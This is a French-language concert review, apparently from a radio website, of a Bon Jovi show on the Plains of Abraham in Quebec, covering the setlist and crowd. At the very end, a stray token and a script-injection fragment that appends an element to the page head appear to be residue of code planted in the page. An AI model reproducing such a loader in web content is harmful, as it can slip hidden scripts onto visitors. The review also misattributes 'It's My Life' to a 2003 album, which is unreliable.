La foule de spectateur qui recouvrait les Plaines d'Abraham se comptait par milliers. Hier soir, ce sont des gens de Québec et des environs qui se sont déplacé afin d'assister au spectacle en plein air du célèbre groupe rock américain: BON JOVI. Afin de vous partager l'athmosphère qui régnaît sur les lieux, ULTIMRADIO était là, pour vous. Retour sur un spectacle enivrant et inouliable.

                                                                                                      …

                La tension est à son comble auprès de l'impressionnante foule qui a envahi les Plaines d'Abraham à Québec. Les plus grands fans de BON JOVI se sont levés tôt afin d'avoir une place de choix auprès de leur idole.

Nous sommes à quelques minutes de 21h30, lorsque tout à coup, sur les écrans géants, apparaît une courte vidéo… une suite de mots formant une spirale, mettant l'accent sur le mot ''HOPE''. Le goupe entre en scène aussitôt que l'ombrage de leur silhouette disparaît de la projection. Jon arrive le dernière, derrière des verres fumées et portant une veste de cuir à ceinturon rappellant le drapeau américain. Se lançant tout de suite dans la performance de ''Raise Your Hand'', c'est en levant les bras hauts dans les airs que la foule peut exprimer enfin son enthousiasme. Le chanteur principal a peine lui aussi, à contrôler son plaisir d'être ici. Dansant et sautant sur place, il continue de donner à son public ce qu'il attend de lui. Après avoir fait chanter la fin de ''Bad Name'' par la foule, suivi de ''Born To Be My Baby'', Jon retire ses lunettes et poursuit avec ''We Weren't Born To Follow'' et ''Lost Highway'', Il s'assure que tout le monde passe un beau lundi soir avant de faire leur grand succès ''It's My Life'' de l'album THIS LEFT FEELS RIGHT, paru en 2003. La foule balance les bras de gauche à droite sur ''Captains Crash And The Beauty Queen From Mars'' et se donne à fond sur le rock de ''Runaway''. En plus des milliers de points rouges clignotant sans cesse, la flamme des briquets et l'éclairage des cellulaires ouverts créent une vue renversante durant la chanson ''I'll Be There For You'', un panorama qui a dû, sans aucun doute, émouvoir le band tellement la beauté était à couper le souffle.

Rar

e sont les gens qui se font chanter BONNE FËTE par plus de 60 000 personnes et c'est ce à quoi le membre guitariste RICHIE SAMBORA, a eu droit. C'est même lui qui commencera à chanter '' Wanted''. Se lançant la balle, c'est dans une parfaite harmonie que les voix de Jon et de Richie chanteront les dernières notes musicales.  Maracas à la main tout au long de de ''Keep The Faith'', Jon Bon Jovi et ses musiciens continue d'offrir le meilleur d'eux même avec '' We Got It Going On'', '' Have A Nice Day'', '' Saturday Night'' et ''Who Says''. La foule, en extase, suit le rythme avec les bras, la tête, les pieds…bref, tout ce qu'ils peuvent bouger. Durant ''BAD MEDECINE'' Jon descend de la scène et va rejoindre ses fans à l'avant-scène. Une femme l'agrippe et l'embrasse . Elle ne veut plus le laisser partir. Jon finit par se dégager doucement et remonte un peu plus loin sur la clôture qui sépare la foule de la scène. Il s'est complètement offert à son public. Il remonte rapidement sur scène et sur les rythme de la chanson '' SHOUT'' du groupe des année 50, The Isley Brothers, tous se met à se déhancher et à danser. Jon, déchaîné, se jette à genoux devant son batteur qui ne s'arrête plus. À plusieurs reprises, c'est haut dans les airs que Jon tiendra son pied de micro, dirigeant celui-ci vers la foule. Après '' In These Arms'' et'' Sleep When I'm Dead'', chacun des membres de ce groupe légendaire enlèvent leurs intruments et quitte la scène en saluant la foule. Seul les lumières bleus et la fumée conserve un décor sur les planches pendant que le public cris l'éternel ''oh hé ! oh hé, oh hé, oh hé…'' Après moins de 2 minutes, BON JOVI remonte sur scène..on n'aurait pas pu les laisser partir sans entendre '' Livin' On A Prayer''. La foule est en délire; BON JOVI n'a pas le choix…une autre dernière chanson ! C'est avec '' I Love This Town', qu'il termine cet électrisant concert en plein air. Respectueux de leurs fans, avant de quitter la scène, tous les membres prennent le temps de bien saluer leurs fans, savourant tout cet amour, en sachant bien que c'est grâce aussi à eux, s'ils ont la carrière incroyable depuis près de trente ans.

Enchaînant sans relâche leurs nombreux succès, c'est sous un ciel plutôt dégagé et une température confortable mais fraîche, que BON JOVI a su satisfaire la foule en musique et en émotion en les faisant danser, rocker et chanter.

Pour voir plus de photos: http://www.flickr.com/photos/infofestival/7541514290/in/set-72157630509464396

zp8497586rq

d.getElementsByTagName(‘head’)[0].appendChild(s);